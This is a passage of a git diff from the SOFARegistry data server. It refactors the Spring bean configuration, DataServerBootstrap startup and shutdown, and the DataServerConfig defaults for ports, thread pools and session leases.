list; + } + + @Bean(name = "serverSyncHandlers") + public Collection serverSyncHandlers() { + Collection list = new ArrayList<>(); + list.add(slotFollowerDiffDataInfoIdRequestHandler()); + list.add(slotFollowerDiffPublisherRequestHandler()); + return list; + } + + @Bean(name = "metaClientHandlers") + public Collection metaClientHandlers() { + Collection list = new ArrayList<>(); + list.add(notifyProvideDataChangeHandler()); + list.add(slotTableChangeEventHandler()); + return list; + } + + @Bean + public AbstractServerHandler getDataHandler() { + return new GetDataHandler(); + } + + @Bean + public AbstractServerHandler slotFollowerDiffDataInfoIdRequestHandler() { + return new SlotFollowerDiffDigestRequestHandler(); + } + + @Bean + public AbstractServerHandler slotFollowerDiffPublisherRequestHandler() { + return new SlotFollowerDiffPublisherRequestHandler(); + } + + @Bean + public AbstractServerHandler getDataVersionsHandler() { + return new GetDataVersionsHandler(); + } + + @Bean + public AbstractServerHandler batchPutDataHandler() { + return new BatchPutDataHandler(); + } + + @Bean + public NotifyProvideDataChangeHandler notifyProvideDataChangeHandler() { + return new NotifyProvideDataChangeHandler(); + } + + @Bean + public SlotTableChangeEventHandler slotTableChangeEventHandler() { + return new SlotTableChangeEventHandler(); + } + } + + @Configuration + public static class DataServerEventBeanConfiguration { + + @Bean + public DataChangeEventCenter dataChangeEventCenter() { + return new DataChangeEventCenter(); + } + } + + @Configuration + public static class DataServerRemotingBeanConfiguration { + + @Bean + public MetaServerManager metaServerManager() { + return new DataMetaServerManager(); + } + + @Bean + public MetaServerServiceImpl metaServerService() { + return new MetaServerServiceImpl(); + } + } + + @Configuration + public static class ResourceConfiguration { + + @Bean + public ResourceConfig jerseyResourceConfig() { + ResourceConfig resourceConfig = new ResourceConfig(); + resourceConfig.register(JacksonFeature.class); + return resourceConfig; + } + + @Bean + public HealthResource healthResource() { + return new HealthResource(); + } + + @Bean + public DatumApiResource datumApiResource() { + return new DatumApiResource(); + } + @Bean @ConditionalOnMissingBean - public DataServerBootstrap dataServerBootstrap() { - return new DataServerBootstrap(); - } - - @Configuration - protected static class DataServerBootstrapConfigConfiguration { - - @Bean - public CommonConfig commonConfig() { - return new CommonConfig(); - } - - @Bean - public DataServerConfig dataServerBootstrapConfig(CommonConfig commonConfig) { - return new DataServerConfig(commonConfig); - } - - @Bean - public DataNodeStatus dataNodeStatus() { - return new DataNodeStatus(); - } - - @Bean(name = "PropertySplitter") - public PropertySplitter propertySplitter() { - return new PropertySplitter(); - } - } - - @Configuration - public static class SessionRemotingConfiguration { - @Bean - public Exchange jerseyExchange() { - return new JerseyExchange(); - } - - @Bean - public Exchange boltExchange() { - return new BoltExchange(); - } - - @Bean - public MetaNodeExchanger metaNodeExchanger() { - return new MetaNodeExchanger(); - } - - @Bean - public DataNodeExchanger dataNodeExchanger() { - return new DataNodeExchanger(); - } - - @Bean - public DataServerCache dataServerCache() { - return new DataServerCache(); - } - - @Bean - public ForwardService forwardService() { - return new ForwardServiceImpl(); - } - - @Bean - public SessionServerConnectionFactory sessionServerConnectionFactory() { - return new SessionServerConnectionFactory(); - } - - @Bean - public DataServerConnectionFactory dataServerConnectionFactory() { - return new DataServerConnectionFactory(); - } - - @Bean - public MetaServerConnectionFactory metaServerConnectionFactory() { - return new MetaServerConnectionFactory(); - } - - @Bean(name = "serverHandlers") - public Collection serverHandlers(DataServerConfig dataServerBootstrapConfig) { - Collection list = new ArrayList<>(); - list.add(getDataHandler()); - list.add(clientOffHandler()); - list.add(getDataVersionsHandler()); - list.add(publishDataProcessor(dataServerBootstrapConfig)); - list.add(sessionServerRegisterHandler()); - list.add(unPublishDataHandler()); - list.add(dataServerConnectionHandler()); - return list; - } - - @Bean(name = "serverSyncHandlers") - public Collection serverSyncHandlers(DataServerConfig dataServerBootstrapConfig) { - Collection list = new ArrayList<>(); - list.add(getDataHandler()); - list.add(publishDataProcessor(dataServerBootstrapConfig)); - list.add(unPublishDataHandler()); - list.add(notifyFetchDatumHandler()); - list.add(notifyOnlineHandler()); - list.add(syncDataHandler()); - list.add(dataSyncServerConnectionHandler()); - return list; - } - - @Bean(name = "dataClientHandlers") - public Collection dataClientHandlers() { - Collection list = new ArrayList<>(); - list.add(notifyDataSyncHandler()); - list.add(fetchDataHandler()); - return list; - } - - @Bean(name = "metaClientHandlers") - public Collection metaClientHandlers() { - Collection list = new ArrayList<>(); - list.add(serverChangeHandler()); - list.add(statusConfirmHandler()); - return list; - } - - @Bean - public AbstractServerHandler dataServerConnectionHandler() { - return new DataServerConnectionHandler(); - } - - @Bean - public AbstractServerHandler dataSyncServerConnectionHandler() { - return new DataSyncServerConnectionHandler(); - } - - @Bean - public AbstractServerHandler getDataHandler() { - return new GetDataHandler(); - } - - @Bean - public AbstractServerHandler getDataVersionsHandler() { - return new GetDataVersionsHandler(); - } - - @Bean - public AbstractServerHandler clientOffHandler() { - return new ClientOffHandler(); - } - - @Bean - public AbstractServerHandler publishDataProcessor(DataServerConfig dataServerBootstrapConfig) { - return new PublishDataHandler(dataServerBootstrapConfig); - } - - @Bean - public AbstractServerHandler sessionServerRegisterHandler() { - return new SessionServerRegisterHandler(); - } - - @Bean - public AbstractServerHandler unPublishDataHandler() { - return new UnPublishDataHandler(); - } - - @Bean - public AbstractServerHandler notifyFetchDatumHandler() { - return new NotifyFetchDatumHandler(); - } - - @Bean - public AbstractServerHandler notifyOnlineHandler() { - return new NotifyOnlineHandler(); - } - - @Bean - public AbstractServerHandler syncDataHandler() { - return new SyncDataHandler(); - } - - @Bean - public AbstractClientHandler notifyDataSyncHandler() { - return new NotifyDataSyncHandler(); - } - - @Bean - public AbstractClientHandler fetchDataHandler() { - return new FetchDataHandler(); - } - - @Bean - public AbstractClientHandler serverChangeHandler() { - return new ServerChangeHandler(); - } - - @Bean - public AbstractClientHandler statusConfirmHandler() { - return new StatusConfirmHandler(); - } - } - - @Configuration - public static class DataServerNotifyBeanConfiguration { - @Bean - public DataChangeHandler dataChangeHandler() { - return new DataChangeHandler(); - } - - @Bean - public SessionServerNotifier sessionServerNotifier() { - return new SessionServerNotifier(); - } - - @Bean - public TempPublisherNotifier tempPublisherNotifier() { - return new TempPublisherNotifier(); - } - - @Bean - public BackUpNotifier backUpNotifier() { - return new BackUpNotifier(); - } - - @Bean(name = "dataChangeNotifiers") - public List dataChangeNotifiers(DataServerConfig dataServerBootstrapConfig) { - List list = new ArrayList<>(); - list.add(sessionServerNotifier()); - list.add(tempPublisherNotifier()); - list.add(backUpNotifier()); - return list; - } - } - - @Configuration - public static class DataServerSyncBeanConfiguration { - - @Bean - public SyncDataService syncDataService() { - return new SyncDataServiceImpl(); - } - - @Bean - public AcceptorStore localAcceptorStore() { - return new LocalAcceptorStore(); - } - - @Bean - public Scheduler syncDataScheduler() { - return new Scheduler(); - } - - @Bean - public StoreServiceFactory storeServiceFactory() { - return new StoreServiceFactory(); - } - } - - @Configuration - public static class DataServerEventBeanConfiguration { - - @Bean - public DataServerChangeEventHandler dataServerChangeEventHandler() { - return new DataServerChangeEventHandler(); - } - - @Bean - public LocalDataServerChangeEventHandler localDataServerChangeEventHandler() { - return new LocalDataServerChangeEventHandler(); - } - - @Bean - public MetaServerChangeEventHandler metaServerChangeEventHandler() { - return new MetaServerChangeEventHandler(); - } - - @Bean - public StartTaskEventHandler startTaskEventHandler() { - return new StartTaskEventHandler(); - } - - @Bean - public LocalDataServerCleanHandler localDataServerCleanHandler() { - return new LocalDataServerCleanHandler(); - } - - @Bean - public GetSyncDataHandler getSyncDataHandler() { - return new GetSyncDataHandler(); - } - - @Bean - public DisconnectEventHandler disconnectEventHandler() { - return new DisconnectEventHandler(); - } - - @Bean - public EventCenter eventCenter() { - return new EventCenter(); - } - - @Bean - public DataChangeEventCenter dataChangeEventCenter() { - return new DataChangeEventCenter(); - } - } - - @Configuration - public static class DataServerRemotingBeanConfiguration { - - @Bean - public ConnectionRefreshTask connectionRefreshTask() { - return new ConnectionRefreshTask(); - } - - @Bean - public ConnectionRefreshMetaTask connectionRefreshMetaTask() { - return new ConnectionRefreshMetaTask(); - } - - @Bean - public ReNewNodeTask reNewNodeTask() { - return new ReNewNodeTask(); - } - - @Bean(name = "tasks") - public List tasks() { - List list = new ArrayList<>(); - list.add(connectionRefreshTask()); - list.add(connectionRefreshMetaTask()); - list.add(reNewNodeTask()); - return list; - } - - @Bean - public IMetaServerService metaServerService() { - return new DefaultMetaServiceImpl(); - } - } - - @Configuration - public static class ResourceConfiguration { - - @Bean - public ResourceConfig jerseyResourceConfig() { - ResourceConfig resourceConfig = new ResourceConfig(); - resourceConfig.register(JacksonFeature.class); - return resourceConfig; - } - - @Bean - public HealthResource healthResource() { - return new HealthResource(); - } - - @Bean - public DataDigestResource dataDigestResource() { - return new DataDigestResource(); - } - } -} \ No newline at end of file + public DataDigestResource dataDigestResource() { + return new DataDigestResource(); + } + + @Bean + public SlotGenericResource slotGenericResource() { + return new SlotGenericResource(); + } + + @Bean + public MetricsResource metricsResource() { + return new MetricsResource(); + } + + @Bean + public RegistryOpsResource opsResource() { + return new RegistryOpsResource(); + } + + @Bean + public SlotTableStatusResource slotTableResource() { + return new SlotTableStatusResource(); + } + } + + @Configuration + public static class ExecutorConfiguration { + + @Bean(name = "publishProcessorExecutor") + public ThreadPoolExecutor publishProcessorExecutor(DataServerConfig dataServerConfig) { + return new MetricsableThreadPoolExecutor( + "PublishProcessorExecutor", + dataServerConfig.getPublishExecutorMinPoolSize(), + dataServerConfig.getPublishExecutorMaxPoolSize(), + 300, + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(dataServerConfig.getPublishExecutorQueueSize()), + new NamedThreadFactory("PutExecutor", true)); + } + + @Bean(name = "getDataProcessorExecutor") + public ThreadPoolExecutor getDataProcessorExecutor(DataServerConfig dataServerConfig) { + return new MetricsableThreadPoolExecutor( + "GetDataProcessorExecutor", + dataServerConfig.getGetDataExecutorMinPoolSize(), + dataServerConfig.getGetDataExecutorMaxPoolSize(), + dataServerConfig.getGetDataExecutorKeepAliveTime(), + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(dataServerConfig.getGetDataExecutorQueueSize()), + new NamedThreadFactory("GetExecutor", true)); + } + + @Bean(name = "slotSyncRequestProcessorExecutor") + public ThreadPoolExecutor slotSyncRequestProcessorExecutor(DataServerConfig dataServerConfig) { + return new MetricsableThreadPoolExecutor( + "SlotSyncRequestProcessorExecutor", + dataServerConfig.getSlotSyncRequestExecutorMinPoolSize(), + dataServerConfig.getSlotSyncRequestExecutorMaxPoolSize(), + 300, + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(dataServerConfig.getSlotSyncRequestExecutorQueueSize()), + new NamedThreadFactory("SyncExecutor", true)); + } + + @Bean(name = "metaNodeExecutor") + public ThreadPoolExecutor metaNodeExecutor(DataServerConfig dataServerConfig) { + return new MetricsableThreadPoolExecutor( + "metaExecutor", + dataServerConfig.getMetaNodeExecutorPoolSize(), + dataServerConfig.getMetaNodeExecutorPoolSize(), + 300, + TimeUnit.SECONDS, + new ArrayBlockingQueue<>(dataServerConfig.getMetaNodeExecutorQueueSize()), + new NamedThreadFactory("metaExecutor", true)); + } + } + + @Configuration + public static class DataProvideDataConfiguration { + + @Bean + public ProvideDataProcessor provideDataProcessorManager() { + return new ProvideDataProcessorManager(); + } + + @Bean + public ProvideDataProcessor sessionLeaseProvideDataProcessor( + ProvideDataProcessor provideDataProcessorManager) { + ProvideDataProcessor sessionLeaseProvideDataProcessor = + new SessionLeaseProvideDataProcessor(); + ((ProvideDataProcessorManager) provideDataProcessorManager) + .addProvideDataProcessor(sessionLeaseProvideDataProcessor); + return sessionLeaseProvideDataProcessor; + } + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBootstrap.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBootstrap.java index 02bec192f..f905e5caf 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBootstrap.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerBootstrap.java @@ -16,239 +16,300 @@ */ package com.alipay.sofa.registry.server.data.bootstrap; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.slot.SlotTable; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.metrics.ReporterUtils; import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.ChannelHandler; import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.data.datasync.sync.Scheduler; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.event.MetaServerChangeEvent; -import com.alipay.sofa.registry.server.data.event.StartTaskEvent; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import org.glassfish.jersey.server.ResourceConfig; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.boot.context.properties.EnableConfigurationProperties; -import org.springframework.context.ApplicationContext; - -import javax.annotation.Resource; -import javax.ws.rs.Path; -import javax.ws.rs.ext.Provider; +import com.alipay.sofa.registry.server.data.change.DataChangeEventCenter; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.github.rholder.retry.Retryer; +import com.github.rholder.retry.RetryerBuilder; +import com.github.rholder.retry.StopStrategies; +import com.github.rholder.retry.WaitStrategies; +import com.google.common.base.Predicate; import java.lang.annotation.Annotation; import java.util.Collection; import java.util.Date; import java.util.Map; +import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; +import javax.annotation.Resource; +import javax.ws.rs.Path; +import javax.ws.rs.ext.Provider; +import org.glassfish.jersey.server.ResourceConfig; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.boot.context.properties.EnableConfigurationProperties; +import org.springframework.context.ApplicationContext; /** - * - * * @author qian.lqlq * @version $Id: DataServerBootstrap.java, v 0.1 2017-12-06 20:50 qian.lqlq Exp $ */ @EnableConfigurationProperties public class DataServerBootstrap { - private static final Logger LOGGER = LoggerFactory - .getLogger(DataServerBootstrap.class); + private static final Logger LOGGER = LoggerFactory.getLogger(DataServerBootstrap.class); - @Autowired - private DataServerConfig dataServerBootstrapConfig; + @Autowired private DataServerConfig dataServerConfig; - @Autowired - private IMetaServerService metaServerService; + @Autowired private MetaServerService metaServerService; - @Autowired - private Scheduler syncDataScheduler; + @Autowired private ApplicationContext applicationContext; - @Autowired - private ApplicationContext applicationContext; + @Autowired private ResourceConfig jerseyResourceConfig; - @Autowired - private ResourceConfig jerseyResourceConfig; + @Autowired private SlotManager slotManager; - @Autowired - private Exchange jerseyExchange; + @Autowired private Exchange jerseyExchange; - @Autowired - private Exchange boltExchange; + @Autowired private Exchange boltExchange; - @Autowired - private EventCenter eventCenter; + @Autowired private DataChangeEventCenter dataChangeEventCenter; - @Resource(name = "serverHandlers") - private Collection serverHandlers; + @Autowired private SessionLeaseManager sessionLeaseManager; - @Resource(name = "serverSyncHandlers") - private Collection serverSyncHandlers; + @Resource(name = "serverHandlers") + private Collection serverHandlers; - private Server server; + @Resource(name = "serverSyncHandlers") + private Collection serverSyncHandlers; - private Server dataSyncServer; + private Server server; - private Server httpServer; + private Server notifyServer; - private AtomicBoolean httpServerStarted = new AtomicBoolean(false); + private Server dataSyncServer; - private AtomicBoolean schedulerStarted = new AtomicBoolean(false); + private Server httpServer; - private AtomicBoolean serverForSessionStarted = new AtomicBoolean(false); + private final AtomicBoolean httpServerStarted = new AtomicBoolean(false); - private AtomicBoolean serverForDataSyncStarted = new AtomicBoolean(false); + private final AtomicBoolean schedulerStarted = new AtomicBoolean(false); - /** - * start dataserver - */ - public void start() { - try { - LOGGER.info("[DataServerBootstrap] begin start server"); + private final AtomicBoolean serverForSessionStarted = new AtomicBoolean(false); - openDataServer(); + private final AtomicBoolean serverForDataSyncStarted = new AtomicBoolean(false); - openDataSyncServer(); + private final Retryer retryer = + RetryerBuilder.newBuilder() + .retryIfException() + .retryIfResult( + new Predicate() { + @Override + public boolean apply(Boolean input) { + return !input; + } + }) + .withWaitStrategy(WaitStrategies.exponentialWait(1000, 10000, TimeUnit.MILLISECONDS)) + .withStopStrategy(StopStrategies.stopAfterAttempt(10)) + .build(); - openHttpServer(); + /** start dataserver */ + public void start() { + try { + LOGGER.info("begin start server"); + LOGGER.info("release properties: {}", ServerEnv.getReleaseProps()); + LOGGER.info("the configuration items are as follows: " + dataServerConfig.toString()); - startRaftClient(); + ReporterUtils.enablePrometheusDefaultExports(); - startScheduler(); + openDataServer(); - Runtime.getRuntime().addShutdownHook(new Thread(this::doStop)); + openDataSyncServer(); - LOGGER.info("[DataServerBootstrap] start server success"); - } catch (Exception e) { - throw new RuntimeException("[DataServerBootstrap] start server error", e); - } - } + openHttpServer(); - private void openDataServer() { - try { - if (serverForSessionStarted.compareAndSet(false, true)) { - server = boltExchange.open(new URL(NetUtil.getLocalAddress().getHostAddress(), - dataServerBootstrapConfig.getPort()), serverHandlers - .toArray(new ChannelHandler[serverHandlers.size()])); - LOGGER.info("Data server for session started! port:{}", - dataServerBootstrapConfig.getPort()); - } - } catch (Exception e) { - serverForSessionStarted.set(false); - LOGGER - .error("Data server start error! port:{}", dataServerBootstrapConfig.getPort(), e); - throw new RuntimeException("Data server start error!", e); - } - } + renewNode(); + fetchProviderData(); - private void openDataSyncServer() { - try { - if (serverForDataSyncStarted.compareAndSet(false, true)) { - dataSyncServer = boltExchange.open(new URL(NetUtil.getLocalAddress() - .getHostAddress(), dataServerBootstrapConfig.getSyncDataPort()), - serverSyncHandlers.toArray(new ChannelHandler[serverSyncHandlers.size()])); - LOGGER.info("Data server for sync started! port:{}", - dataServerBootstrapConfig.getSyncDataPort()); - } - } catch (Exception e) { - serverForDataSyncStarted.set(false); - LOGGER.error("Data sync server start error! port:{}", - dataServerBootstrapConfig.getSyncDataPort(), e); - throw new RuntimeException("Data sync server start error!", e); - } - } + // wait until slot table is get + retryer.call( + () -> { + return slotManager.getSlotTableEpoch() != SlotTable.INIT.getEpoch(); + }); - private void openHttpServer() { - try { - if (httpServerStarted.compareAndSet(false, true)) { - bindResourceConfig(); - httpServer = jerseyExchange.open( - new URL(NetUtil.getLocalAddress().getHostAddress(), dataServerBootstrapConfig - .getHttpServerPort()), new ResourceConfig[] { jerseyResourceConfig }); - LOGGER.info("Open http server port {} success!", - dataServerBootstrapConfig.getHttpServerPort()); - } - } catch (Exception e) { - httpServerStarted.set(false); - LOGGER.error("Open http server port {} error!", - dataServerBootstrapConfig.getHttpServerPort(), e); - throw new RuntimeException("Open http server error!", e); - } - } + startScheduler(); - private void startRaftClient() { - metaServerService.startRaftClient(); - eventCenter.post(new MetaServerChangeEvent(metaServerService.getMetaServerMap())); - LOGGER.info("[DataServerBootstrap] raft client started!Leader is {}", - metaServerService.getLeader()); - } + Runtime.getRuntime().addShutdownHook(new Thread(this::doStop)); - private void startScheduler() { - try { - if (schedulerStarted.compareAndSet(false, true)) { - syncDataScheduler.startScheduler(); - eventCenter.post(StartTaskEvent.getInstance()); - } - } catch (Exception e) { - schedulerStarted.set(false); - LOGGER.error("Data Scheduler start error!", e); - throw new RuntimeException("Data Scheduler start error!", e); - } + LOGGER.info("start server success"); + } catch (Exception e) { + throw new RuntimeException("start server error", e); } - - public void destroy() { - doStop(); + } + + private void openDataServer() { + try { + if (serverForSessionStarted.compareAndSet(false, true)) { + // open notify port first + notifyServer = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), dataServerConfig.getNotifyPort()), + dataServerConfig.getLowWaterMark(), + dataServerConfig.getHighWaterMark(), + new ChannelHandler[0]); + server = + boltExchange.open( + new URL(NetUtil.getLocalAddress().getHostAddress(), dataServerConfig.getPort()), + dataServerConfig.getLowWaterMark(), + dataServerConfig.getHighWaterMark(), + serverHandlers.toArray(new ChannelHandler[serverHandlers.size()])); + dataChangeEventCenter.init(); + LOGGER.info( + "Data server for session started! port:{}, notifyPort:{}", + dataServerConfig.getPort(), + dataServerConfig.getNotifyPort()); + } + } catch (Exception e) { + serverForSessionStarted.set(false); + LOGGER.error("Data server start error! port:{}", dataServerConfig.getPort(), e); + throw new RuntimeException("Data server start error!", e); } - - private void doStop() { - try { - LOGGER.info("{} Shutting down Data Server..", new Date().toString()); - - if (httpServer != null && httpServer.isOpen()) { - httpServer.close(); - } - - if (server != null && server.isOpen()) { - server.close(); - } - - if (dataSyncServer != null && dataSyncServer.isOpen()) { - dataSyncServer.close(); - } - - if (syncDataScheduler != null) { - syncDataScheduler.stopScheduler(); - } - } catch (Throwable e) { - LOGGER.error("Shutting down Data Server error!", e); - } - LOGGER.info("{} Data server is now shutdown...", new Date().toString()); + } + + private void openDataSyncServer() { + try { + if (serverForDataSyncStarted.compareAndSet(false, true)) { + dataSyncServer = + boltExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), dataServerConfig.getSyncDataPort()), + dataServerConfig.getLowWaterMark(), + dataServerConfig.getHighWaterMark(), + serverSyncHandlers.toArray(new ChannelHandler[serverSyncHandlers.size()])); + LOGGER.info("Data server for sync started! port:{}", dataServerConfig.getSyncDataPort()); + } + } catch (Exception e) { + serverForDataSyncStarted.set(false); + LOGGER.error("Data sync server start error! port:{}", dataServerConfig.getSyncDataPort(), e); + throw new RuntimeException("Data sync server start error!", e); } - - private void bindResourceConfig() { - registerInstances(Path.class); - registerInstances(Provider.class); + } + + private void openHttpServer() { + try { + if (httpServerStarted.compareAndSet(false, true)) { + bindResourceConfig(); + httpServer = + jerseyExchange.open( + new URL( + NetUtil.getLocalAddress().getHostAddress(), + dataServerConfig.getHttpServerPort()), + new ResourceConfig[] {jerseyResourceConfig}); + LOGGER.info("Open http server port {} success!", dataServerConfig.getHttpServerPort()); + } + } catch (Exception e) { + httpServerStarted.set(false); + LOGGER.error("Open http server port {} error!", dataServerConfig.getHttpServerPort(), e); + throw new RuntimeException("Open http server error!", e); } + } - private void registerInstances(Class annotationType) { - Map beans = applicationContext.getBeansWithAnnotation(annotationType); - if (beans != null && !beans.isEmpty()) { - beans.forEach((beanName, bean) -> jerseyResourceConfig.registerInstances(bean)); - } + private void renewNode() { + metaServerService.renewNode(); + // init session lease with first renew + for (ProcessId processId : metaServerService.getSessionProcessIds()) { + sessionLeaseManager.renewSession(processId); } - - public AtomicBoolean getHttpServerStarted() { - return httpServerStarted; + metaServerService.startRenewer(); + } + + private void fetchProviderData() { + ProvideData provideData = metaServerService.fetchData(ValueConstants.DATA_SESSION_LEASE_SEC); + Integer expireSec = ProvideData.toInteger(provideData); + if (expireSec != null) { + dataServerConfig.setSessionLeaseSecs(expireSec); + LOGGER.info( + "Fetch {}={}, update current config", ValueConstants.DATA_SESSION_LEASE_SEC, expireSec); } - public AtomicBoolean getSchedulerStarted() { - return schedulerStarted; + provideData = metaServerService.fetchData(ValueConstants.DATA_DATUM_SYNC_SESSION_INTERVAL_SEC); + Integer syncSessionIntervalSec = ProvideData.toInteger(provideData); + if (syncSessionIntervalSec != null) { + dataServerConfig.setSlotLeaderSyncSessionIntervalSecs(syncSessionIntervalSec); + LOGGER.info( + "Fetch {}={}, update current config", + ValueConstants.DATA_DATUM_SYNC_SESSION_INTERVAL_SEC, + syncSessionIntervalSec); } - - public AtomicBoolean getServerForSessionStarted() { - return serverForSessionStarted; + } + + private void startScheduler() { + try { + schedulerStarted.compareAndSet(false, true); + } catch (Exception e) { + schedulerStarted.set(false); + LOGGER.error("Data Scheduler start error!", e); + throw new RuntimeException("Data Scheduler start error!", e); } + } + + public void destroy() { + doStop(); + } - public AtomicBoolean getServerForDataSyncStarted() { - return serverForDataSyncStarted; + private void doStop() { + try { + LOGGER.info("{} Shutting down Data Server..", new Date().toString()); + + if (httpServer != null && httpServer.isOpen()) { + httpServer.close(); + } + + if (server != null && server.isOpen()) { + server.close(); + } + + if (dataSyncServer != null && dataSyncServer.isOpen()) { + dataSyncServer.close(); + } + + if (notifyServer != null && notifyServer.isOpen()) { + notifyServer.close(); + } + } catch (Throwable e) { + LOGGER.error("Shutting down Data Server error!", e); + } + LOGGER.info("{} Data server is now shutdown...", new Date().toString()); + } + + private void bindResourceConfig() { + registerInstances(Path.class); + registerInstances(Provider.class); + } + + private void registerInstances(Class annotationType) { + Map beans = applicationContext.getBeansWithAnnotation(annotationType); + if (beans != null && !beans.isEmpty()) { + beans.forEach((beanName, bean) -> jerseyResourceConfig.registerInstances(bean)); } + } + + public boolean getHttpServerStarted() { + return httpServerStarted.get(); + } + + public boolean getSchedulerStarted() { + return schedulerStarted.get(); + } + + public boolean getServerForSessionStarted() { + return serverForSessionStarted.get(); + } + + public boolean getServerForDataSyncStarted() { + return serverForDataSyncStarted.get(); + } } diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerConfig.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerConfig.java index 4d801b711..08c1931be 100644 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerConfig.java +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/bootstrap/DataServerConfig.java @@ -16,587 +16,844 @@ */ package com.alipay.sofa.registry.server.data.bootstrap; -import com.alipay.sofa.registry.net.NetUtil; -import org.springframework.boot.context.properties.ConfigurationProperties; - +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.OsUtils; import java.util.Collection; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.stream.Collectors; +import org.apache.commons.lang.builder.ToStringBuilder; +import org.apache.commons.lang.builder.ToStringStyle; +import org.springframework.boot.context.properties.ConfigurationProperties; /** - * - * * @author qian.lqlq * @version $Id: DataServerBootstrapConfig.java, v 0.1 2017-12-06 20:50 qian.lqlq Exp $ */ @ConfigurationProperties(prefix = DataServerConfig.PRE_FIX) public class DataServerConfig { - public static final String PRE_FIX = "data.server"; - - public static final String IP = NetUtil.getLocalAddress() - .getHostAddress(); - - private int port; - - private int syncDataPort; - - private int metaServerPort; - - private int httpServerPort; - - private int queueCount; + public static final String PRE_FIX = "data.server"; - private int queueSize; + private int port = 9620; + // data change notify + private int notifyPort = 9623; + private int syncDataPort = 9621; + private int syncDataConnNum = 3; + private int syncSessionPort = 9602; + private int syncSessionConnNum = 6; + private int metaServerPort = 9611; - private int notifyIntervalMs; + private int httpServerPort = 9622; - private int clientOffDelayMs; + private int notifyExecutorPoolSize = OsUtils.getCpuCount() * 3; - private int rpcTimeout; + private int notifyExecutorQueueSize = 10000; - private CommonConfig commonConfig; + private int notifyRetryQueueSize = 10000; - private Set metaIps = null; + private int notifyMaxItems = 300; - private int storeNodes = 3; + private int notifyIntervalMillis = 1000; - private int numberOfReplicas = 1000; + private int notifyRetryTimes = 3; - private long localDataServerCleanDelay = 1000 * 60 * 30; + private int notifyRetryBackoffMillis = 500; - private int getDataExecutorMinPoolSize = 80; + private int notifyTempExecutorPoolSize = OsUtils.getCpuCount() * 3; - private int getDataExecutorMaxPoolSize = 400; + private int notifyTempExecutorQueueSize = 4000; + private int notifyTempDataIntervalMillis = 500; - private int getDataExecutorQueueSize = 10000; + private int rpcTimeoutMillis = 3000; - private long getDataExecutorKeepAliveTime = 60; + private CommonConfig commonConfig; - private int notifyDataSyncExecutorMinPoolSize = 80; + private volatile Collection metaAddresses = null; - private int notifyDataSyncExecutorMaxPoolSize = 400; + private int getDataExecutorMinPoolSize = OsUtils.getCpuCount() * 5; - private int notifyDataSyncExecutorQueueSize = 700; + private int getDataExecutorMaxPoolSize = OsUtils.getCpuCount() * 10; - private long notifyDataSyncExecutorKeepAliveTime = 60; + private int getDataExecutorQueueSize = 20000; - private long notifySessionRetryFirstDelay = 1000; + private long getDataExecutorKeepAliveTime = 60; - private long notifySessionRetryIncrementDelay = 1000; + private int publishExecutorMinPoolSize = OsUtils.getCpuCount() * 5; - private int notifySessionRetryTimes = 10; + private int publishExecutorMaxPoolSize = OsUtils.getCpuCount() * 10; - private int publishExecutorMinPoolSize = 80; + private int publishExecutorQueueSize = 10000; - private int publishExecutorMaxPoolSize = 400; + private volatile int sessionLeaseSecs = 30; + private int sessionLeaseCheckIntervalSecs = 5; + private int sessionLeaseCleanDeadlineSecs = 5; - private int publishExecutorQueueSize = 10000; + private int datumCompactDelaySecs = 60 * 3; - /** - * constructor - * @param commonConfig - */ - public DataServerConfig(CommonConfig commonConfig) { - this.commonConfig = commonConfig; - } + private int slotLeaderSyncSessionExecutorThreadSize = OsUtils.getCpuCount() * 3; + private int slotLeaderSyncSessionExecutorQueueSize = 40000; + private volatile int slotLeaderSyncSessionIntervalSecs = 6; - public String getLocalDataCenter() { - return commonConfig.getLocalDataCenter(); - } + private int slotFollowerSyncLeaderExecutorThreadSize = OsUtils.getCpuCount(); + private int slotFollowerSyncLeaderExecutorQueueSize = 10000; + private volatile int slotFollowerSyncLeaderIntervalSecs = 60; - /** - * Getter method for property port. - * - * @return property value of port - */ - public int getPort() { - return port; - } + // the publisher.digest if len(registerId/uuid+long+long), 50bytes + private volatile int slotSyncPublisherDigestMaxNum = 4000; - /** - * Setter method for property port. - * - * @param port value to be assigned to property port - */ - public void setPort(int port) { - this.port = port; 